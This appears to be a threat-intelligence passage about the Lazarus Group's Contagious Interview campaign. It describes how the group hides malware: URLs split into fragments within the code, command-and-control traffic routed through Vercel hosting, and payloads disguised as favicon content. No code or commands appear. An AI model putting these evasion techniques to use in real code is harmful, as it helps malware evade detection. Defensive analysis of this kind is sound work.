The Contagious Interview campaign, attributed to the Lazarus Group, has demonstrated significant evolution in its operational techniques, particularly in the delivery mechanisms for its primary payloads: BeaverTail, InvisibleFerret, and OtterCookie. Recent analysis reveals that the group has adopted innovative methodologies to obfuscate their malicious code, making it more challenging for automated detection tools to identify their activities. One notable tactic employed by the Lazarus Group involves fragmenting URLs within the code. This method hides the command and control (C2) infrastructure by using legitimate hosting platforms, specifically http://Vercel.App, to deliver malicious payloads disguised as innocuous favicon content. The mechanism involves a call to a "doing" constant, which initiates a request operation to the C2 server.